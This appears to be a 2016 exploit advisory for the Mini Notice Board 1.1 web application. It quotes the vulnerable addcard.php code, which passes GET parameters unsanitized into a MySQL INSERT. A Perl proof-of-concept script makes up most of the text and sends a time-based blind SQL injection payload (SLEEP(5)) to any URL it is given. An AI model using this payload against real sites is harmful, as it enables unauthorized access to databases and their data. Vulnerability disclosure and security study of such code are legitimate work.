Mini Notice Board 1.1 SQL Injection
Posted on 02 November 2016
#!/usr/bin/perl -w #mininoticeboard_v1.1 SQL Injection Exploit #========================================== #Discovered by N_A , N_A[at]tutanota.com #======================================== #Vendor has been notified #========================= #Description #============ #Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car #or lawnmower or want to provide services, they can simply write a card. #It supports unlimited Regions. #https://sourceforge.net/projects/mininoticeboard/ #Vulnerability #============= #addcard.php: #The variables from the GET request are fed unsanitized directly into the MYSQL database resulting in an SQL Injection #$title = $_GET["title"]; #$body = $_GET["body"]; #$contact = $_GET["contact"]; #$address = $_GET["address"]; #$tel = $_GET["tel"]; #$date_day = date("d"); #$date_month = date("m"); #$date_year = date("y"); #$romovalcode = genremovalcode(); #$categorie = $cid; #if($title!="" && $body!="" && $tel!="" && $contact!="") #{ # include 'dbconnect.php'; # $sqlset["tablename"] = $sqlset["tableprefix"].'content'; # mysql_query('INSERT INTO `'.$sqlset["tablename"].'` (`title`, `content`, `contact`, `address`, `tel`, `date_day`, `date_month`, `date_year`, #`removalcode`, `categorie`) VALUES (''.$title.'', ''.$body.'', ''.$contact.'', ''.$address.'', ''.$tel.'', ''.$date_day.'', #''$date_month.'', ''.$date_year.'', ''.$romovalcode.'', ''.$categorie.'')') or $status = 'red'; #Proof Of Concept Exploit attached below #N_A, N_A[at]tutanota.com use strict; use LWP::Simple; my ($url) = @ARGV; if( not defined $url ) { print "========================================= "; print "Mini Notice Board SQL Injection Exploit "; print " By N_A "; print " "; print "$0 [URL] "; print "$0 127.0.0.1/mininoticeboard "; print "========================================= "; exit; } my $file = '/addcard.php'; #The Vulnerable .php file my $injection = 'title=pentest&body=blah' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND 'OKSG'='OKSG&tel=555&contact=blahblah&address=blahblah&submit=Add+Card'; my $request ="http://".$url.$file."?".$injection; #Forming the exploit string my $content = get $request; die "Could not get $request" unless defined $content; #It should hang here for about 5 seconds..... (SLEEP(5)) as per injection print "########################## "; print "SQL Injection Successful! "; print "########################## "
